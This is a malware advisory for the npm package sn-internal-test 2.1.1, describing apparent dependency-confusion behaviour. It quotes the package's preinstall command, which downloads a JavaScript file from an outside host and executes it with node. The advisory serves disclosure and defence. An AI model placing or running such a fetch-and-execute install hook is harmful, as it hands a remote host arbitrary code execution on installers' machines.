sn-internal-test @2.1.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5645
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js . On any npm install of this package, the installer's machine fetches an unauthenticated, unpinned, mutable JavaScript file from an external author-controlled host and immediately executes it under Node.js with the installer's user privileges, overwriting the package's own index.js. The package describes itself as 'This is our internal app for testing' but is published to the public npm registry with no library functionality — the entire install-time effect is the remote fetch-and-execute. Whatever bytes are served at https://poc.amanrawat.com/hehe.js at install time become arbitrary code running on the installer's machine. The shape is consistent with a dependency-confusion proof-of-concept or active dropper: an internal-sounding name on public npm whose sole behavior is to pull and run remote code.
Source: amazon-inspector (215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.